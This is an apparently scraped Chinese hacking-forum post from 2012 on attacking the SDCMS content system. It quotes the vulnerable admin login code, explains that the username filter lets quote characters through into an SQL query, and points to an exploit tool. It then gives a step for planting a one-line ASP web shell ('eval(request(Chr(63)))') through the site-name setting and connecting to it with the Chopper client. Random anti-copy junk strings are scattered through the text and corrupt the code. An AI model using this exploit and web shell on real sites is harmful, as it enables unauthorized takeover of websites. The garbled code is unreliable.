作者:T00LS 鬼哥
7 l; H+ ?: b5 i漏洞文件:后台目录/index.asp6 T( l* O' ~2 _8 A$ W
7 I. ? D% @$ o/ h7 L) DSub Check
. q1 j Z; A! Y W Dim username,password,code,getcode,Rs) p; E, @( E. Y5 A" ?' [2 g
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
3 B, [0 I8 n! c2 Z, v username=FilterText(Trim(Request.Form("username")),1); f) G) r2 R2 o5 P; w2 n/ t
password=FilterText(Trim(Request.Form("password")),1) I1 y) f" D3 I2 s
code=Trim(Request.Form("yzm"))
' ^. m5 A+ ~0 a6 U6 ] getcode=Session("SDCMSCode")/ |) w: x& `" B2 G' ^4 Q
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died% i, q# l9 ?; o0 |
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
, P: i) y6 m/ V IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied5 r! x6 R# G/ T
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
& \. P" O, T9 z. A/ z IF username="" or password="" Then
6 O2 P% g" V/ C1 _& Y5 U Echo "用户名或密码不能为空"ied
- i3 u1 ~/ M u7 s Else7 u* b0 I% _' b% x: r- y* l! \
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")! v1 A+ E v% `8 |4 t! C) P
IF Rs.Eof Then
5 [$ s- `/ k2 r AddLog username,GetIp,"登录失败",1
; y: }" r& L/ Z/ p0 K& Y/ r Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
2 D0 ]/ q; y& p, ~, H Else- D( k8 B1 l$ T- P( z/ A* C# ^% T
Add_Cookies "sdcms_id",Rs(0)
8 T% J# `7 G7 D; N' U( e/ o Add_Cookies "sdcms_name",username
- S6 ^- ]. z5 h9 L. y; S0 i# C8 k( z Add_Cookies "sdcms_pwd",Rs(2); V+ B, k o3 E* m5 m! c3 d {' `
Add_Cookies "sdcms_admin",Rs(3)+ U# R A2 A8 h$ W2 ~5 F
Add_Cookies "sdcms_alllever",Rs(4)6 w5 y0 ?- Y$ z6 ]1 k7 C$ O
Add_Cookies "sdcms_infolever",Rs(5), _; Q3 R1 i6 Q3 U; b
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
0 _( v# a- g; x, ], a& l AddLog username,GetIp,"登录成功",1" E! D$ I6 H6 b/ W i! ]& ~/ `
'自动删除30天前的Log记录
- _) r4 C7 n7 w+ ` IF Sdcms_DataType Then9 f2 y. G0 ?- ?
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
) Z$ Q* a0 U2 t1 ?; } ~# y5 N Else
, a& ~# e( B. u( K0 ^ Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
# M- q' B- Q7 _6 m* i p End IF% t8 e7 e4 x9 Z8 M8 O
Go("sdcms_index.asp")2 `) h7 K% a9 y9 P- c" ?" f
End IF. B- g$ X/ ~2 u4 L1 H# c! z" \
Rs.Close, r7 k4 Z+ u$ Z/ i5 E# q
Set Rs=Nothing. Q3 U! z! ]! E& S e
End IF% h$ ?3 o. [5 ^& w# X& O, F: v# E! g
End Sub t6 M. m8 v- R j+ c3 Y/ \
8 f7 b$ v3 \/ Y4 `$ C0 o; K+ y- D’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码0 T7 G0 G1 \+ Y& i& o
@, @" Z9 W! YFunction FilterText(ByVal t0,ByVal t1)
" w( x- [3 A- t% g2 C- E1 p3 T IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
5 w& L& W `. } t0=Trim(t0)1 e* Q- U1 m2 [) r: C1 z
Select Case t1
' p7 U$ K+ l# T+ D2 o Case "1"5 Z" f1 T. R6 `9 z
t0=Replace(t0,Chr(32),"")6 X1 F1 E% e: j8 ~* A. J
t0=Replace(t0,Chr(13),"")
: |- G' A9 m+ N. x$ ]5 M7 k+ I; ` t0=Replace(t0,Chr(10)&Chr(10),"")9 C6 u7 f" X4 M# n$ X F' p
t0=Replace(t0,Chr(10),""): j$ e& R7 L B \5 z
Case "2"% z. m; H% p4 J q% H8 \- R2 M
t0=Replace(t0,Chr(8),"")'回格5 |$ g% w: ]2 w" T' E
t0=Replace(t0,Chr(9),"")'tab(水平制表符)9 ~7 X) @- t1 e
t0=Replace(t0,Chr(10),"")'换行
0 j% a- o/ c( z P# f0 @1 J( Z$ Z t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
1 ]0 V3 A- J P& s t0=Replace(t0,Chr(12),"")'换页
4 M& C3 h- Z9 v8 f+ o3 H& i t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
% s8 x4 i; T D5 h! ], X t0=Replace(t0,Chr(22),"")* u+ k' x, V/ E5 P0 _2 ]* x
t0=Replace(t0,Chr(32),"")'空格 SPACE
( v7 R3 P+ J" f7 N t0=Replace(t0,Chr(33),"")'!
9 g1 i5 {1 o/ R9 f( g t0=Replace(t0,Chr(34),"")'"3 A# G! F# r& B1 l" H
t0=Replace(t0,Chr(35),"")'#
( |% o7 Q: u _: Y8 P t0=Replace(t0,Chr(36),"")'$6 X! E8 U' y- h5 |
t0=Replace(t0,Chr(37),"")'%
! g+ T5 Y8 H! Q9 {# l7 u t0=Replace(t0,Chr(38),"")'&
. B, D9 V: s% h) ]% O2 i8 M t0=Replace(t0,Chr(39),"")''# J2 H& o8 \; ]' U# U# B5 J; V9 G. R
t0=Replace(t0,Chr(40),"")'(8 @4 f( U7 y7 \! J2 b; Z
t0=Replace(t0,Chr(41),"")')5 R. t. |( L# _! j* u- K
t0=Replace(t0,Chr(42),"")'*9 m( H9 Q. d7 d/ n5 L& r
t0=Replace(t0,Chr(43),"")'+
9 U1 V5 L& n) |, |6 V t0=Replace(t0,Chr(44),"")',; n: x% R8 S! A7 [) ~- V8 e" l
t0=Replace(t0,Chr(45),"")'-
* n. n F& H4 O9 W" Q t0=Replace(t0,Chr(46),"")'.
' w* ?( Z6 j& M" m t0=Replace(t0,Chr(47),"")'/
; g4 B F( w' p9 S: ~ t0=Replace(t0,Chr(58),"")':
$ H4 Z U4 A* a9 H t0=Replace(t0,Chr(59),"")';: C* Q" P: ^4 h' H& ]2 E
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>! J9 {& `1 F1 X0 [" i4 B# F
t0=Replace(t0,Chr(63),"")'?! t1 U0 A5 ^! t4 w; v4 ?
t0=Replace(t0,Chr(64),"")'@1 J. g: O6 V$ |+ T& y
t0=Replace(t0,Chr(91),"")'\, T" ?" Y* Y" s. U7 y( i6 q8 P& f
t0=Replace(t0,Chr(92),"")'\: x/ k$ d; `% L+ q* P7 S# T; U
t0=Replace(t0,Chr(93),"")']4 M4 d4 z; L- S( _
t0=Replace(t0,Chr(94),"")'^; l w1 P! A% g' e5 \
t0=Replace(t0,Chr(95),"")'_6 z' d3 }# J9 u! W3 |
t0=Replace(t0,Chr(96),"")'`5 E3 D$ `& V5 x' Z
t0=Replace(t0,Chr(123),"")'{
. z) A' F' n$ @* I1 H1 E t0=Replace(t0,Chr(124),"")'|
9 a9 a8 M% ^% P4 m t0=Replace(t0,Chr(125),"")'}+ f/ ~5 }) h x+ L \
t0=Replace(t0,Chr(126),"")'~0 ]: j4 L! C. W) ?* I, T! [
Case Else
5 ]5 _6 K& y. A( [1 G. y# C% E- e t0=Replace(t0, "&", "&")
; P* g$ x, u; D6 K1 W. D/ V3 U t0=Replace(t0, "'", "'")1 g+ M9 d" E/ \' Z. W# k H
t0=Replace(t0, """", """)& Q2 `' @- C3 @$ x
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
- p$ _, N6 J8 K3 z/ X2 _0 [( O' U End Select
! r9 U$ u3 E* c* _% T' o% z1 M IF Instr(Lcase(t0),"expression")>0 Then
2 P; C8 ? }5 B/ Q; d t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
! [7 M& d% P, |, \0 G5 v End If0 x% ~8 S* C$ l
FilterText=t0
' A. \+ d5 v' Y2 MEnd Function
; G- a# v$ V2 P( ~( W
8 M* D" y1 b* a. u3 f7 v+ r* O看到没。直接参数是1 只过滤
1 V* v. ~& A' Y: U t0=Replace(t0,Chr(32)," ")
( J( @$ E4 I! @/ z+ @ t0=Replace(t0,Chr(13),"")
% N r! z% R3 V0 O7 P/ a" ?6 _ t0=Replace(t0,Chr(10)&Chr(10),"6 Z7 K. _3 |* ~/ Y0 E( g& J
")
2 T; _8 D4 F0 @& B- I% ]- N3 J2 V t0=Replace(t0,Chr(10),"
# z. V1 V! Q7 S")% \# _; c I$ t
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
, Z0 R8 @% E3 \/ L& qEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP7 T2 q$ u/ m( R/ X0 y
' y; j0 o; j: y+ n* k3 |8 |
测试:
* ]6 U2 |$ U: O5 C2 v0 K2 M. o/ d0 J' S4 q! a
5 l Q& q! T, w9 K. \: g7 G; ]现在输入工具上验证码,然后点OK
5 x: X3 ? P* X8 C
/ g9 H/ R+ r* e, j) M+ L6 Z- L
# H+ k$ s. k* v4 X0 L" D1 s看到我们直接进入后台管理界面了,呵呵!2 p: D% n+ R. I
- ]( v b6 E. R7 C& w( r3 u+ T9 A- j* a
8 K0 b0 W4 z) `7 L这样直接进入后台了。。。。) U. X; U! P3 c( b. K
% g3 q0 v& v5 ]6 p# E- }/ ?
3 W Z3 }8 o% J; i8 P8 C9 D4 M) K) x& a
0 y0 `+ i: c8 U' M& |2 hSDCMS提权:
" j+ D; B8 E4 j% Z* \. c" j* X' h) d5 e/ N
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
0 a: S4 s* ^3 k" ~" g+ E+ }1 z" h/ g3 ~0 w) R: c$ E' w
& ?4 _4 v; m# X* O/ w* w \! f5 K" x1 A! q/ h# h, U8 T- E
OK,现在用菜刀连接下!
7 B$ T( U% W5 N/ A1 c0 `, `2 Y% R4 f/ E; U0 q6 e/ o' A3 X
; O5 z. K. Z# b' n1 B1 a: b+ z; i- D( e
. y# h" O3 O5 b* R% p6 J5 I
4 U1 z/ E( p6 [- ~$ v' m8 J
|
发表于 2012-11-9 20:57:02
收藏
支持
反对